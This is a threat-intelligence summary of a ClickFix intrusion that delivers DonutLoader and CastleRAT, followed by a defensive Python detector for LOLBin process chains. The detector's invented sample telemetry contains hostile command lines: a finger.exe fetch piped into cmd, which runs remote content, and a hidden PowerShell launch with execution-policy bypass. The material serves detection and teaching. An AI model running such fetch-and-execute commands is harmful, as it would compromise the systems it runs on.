Researchers at MalBeacon observed Velvet Tempest use a ClickFix malvertising lure and legitimate Windows utilities to stage DonutLoader and retrieve the CastleRAT backdoor during a 12‑day intrusion into an emulated environment. After initial access via a ClickFix/CAPTCHA trick that prompted victims to paste an obfuscated command into the Windows Run dialog, operators used nested cmd.exe chains, finger.exe, PowerShell, csc.exe compilation, and Python persistence to harvest credentials and deploy loaders. #VelvetTempest #CastleRAT
Keypoints
- MalBeacon observed the intrusion over 12 days in an emulated U.S. non‑profit environment with over 3,000 endpoints.
- Initial access was achieved via a malvertising ClickFix/CAPTCHA scheme that instructed victims to paste an obfuscated command into the Windows Run dialog.
- Operators leveraged legitimate Windows tools (cmd.exe, finger.exe, PowerShell, csc.exe) to fetch, compile, and execute additional payloads.
- The campaign staged DonutLoader and retrieved the CastleRAT backdoor, a RAT linked to CastleLoader and information stealers like LummaStealer.
- Velvet Tempest (DEV‑0504) is a long‑running ransomware affiliate tied to multiple strains, though Termite ransomware was not deployed in this observed intrusion.
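The execution chain described in the keypoints (Run dialog launch, nested cmd.exe, finger.exe fetching content, PowerShell, csc.exe compiling a payload) is visible in ordinary process-creation telemetry. The following is an added example, not code from the MalBeacon report: a small Python detector that walks parent/child relationships in constructed Sysmon-style events and flags LOLBins whose ancestry runs through cmd.exe back to explorer.exe, which is the parent a Run-dialog command gets. All PIDs, paths, hosts and command lines in the sample are invented for the example and are not indicators from the actual intrusion.

```python
"""Flag ClickFix-style LOLBin chains in process-creation telemetry.

Added example, not code from the MalBeacon report. The events below are
constructed, Sysmon-EventID-1-like records with hypothetical PIDs, paths,
hosts and command lines; they are not telemetry from the described intrusion.
"""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed sample telemetry: a Run-dialog launch (explorer.exe is the
# parent), nested cmd.exe, finger.exe used to pull content from a remote
# host, a hidden PowerShell, and csc.exe compiling a stage. The last two
# events are benign noise (a developer build) that must not be flagged.
SAMPLE_EVENTS = [
    Event(1000, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(2001, 1000, r"C:\Windows\System32\cmd.exe",
          'cmd.exe /c "cmd /c finger user@203.0.113.10 | cmd"'),
    Event(2002, 2001, r"C:\Windows\System32\cmd.exe",
          "cmd /c finger user@203.0.113.10 | cmd"),
    Event(2003, 2002, r"C:\Windows\System32\finger.exe",
          "finger user@203.0.113.10"),
    Event(2004, 2002, r"C:\Windows\System32\cmd.exe", "cmd"),
    Event(2005, 2004, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -nop -w hidden -ep bypass"),
    Event(2006, 2005, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
          "csc.exe /nologo /target:library /out:stage.dll stage.cs"),
    Event(3001, 900, r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
          "devenv.exe"),
    Event(3002, 3001, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
          "csc.exe /noconfig @project.rsp"),
]

# LOLBins named on the page as part of the chain; finger.exe and csc.exe in
# particular have almost no legitimate use under an interactive cmd.exe.
SUSPECT_LOLBINS = {"finger.exe", "csc.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def build_chain(events, pid):
    """Return the process ancestry of `pid` as image basenames, root first.

    Stops when the parent is unknown (not in the event set) or a cycle is hit.
    """
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def flag_clickfix_chains(events):
    """Return (pid, chain) for suspect LOLBins launched via cmd.exe under explorer.exe.

    A ClickFix victim pastes into the Run dialog, so explorer.exe is the root of
    the tree and cmd.exe (often nested several deep) sits between it and the
    LOLBin. A csc.exe under devenv.exe has a different root and is left alone.
    """
    hits = []
    for e in events:
        if basename(e.image) not in SUSPECT_LOLBINS:
            continue
        chain = build_chain(events, e.pid)
        if chain and chain[0] == "explorer.exe" and "cmd.exe" in chain[:-1]:
            hits.append((e.pid, chain))
    return hits


def finger_hosts(events):
    """Extract the remote host from every finger.exe command line (user@host form).

    The host finger.exe is pointed at is the staging server worth blocking and
    hunting for across the fleet.
    """
    hosts = []
    for e in events:
        if basename(e.image) == "finger.exe":
            m = re.search(r"@([\w.\-]+)", e.cmdline)
            if m:
                hosts.append(m.group(1))
    return hosts


if __name__ == "__main__":
    for pid, chain in flag_clickfix_chains(SAMPLE_EVENTS):
        print(pid, " -> ".join(chain))
    print("finger targets:", finger_hosts(SAMPLE_EVENTS))
```

Run against the constructed sample, the detector reports the finger.exe, PowerShell and csc.exe processes (PIDs 2003, 2005, 2006) with their explorer.exe -> cmd.exe -> ... ancestry, and ignores the csc.exe spawned by the developer's devenv.exe. In a real deployment the same logic can be corroborated by the pasted command surviving in the user's RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is where the Run dialog records history.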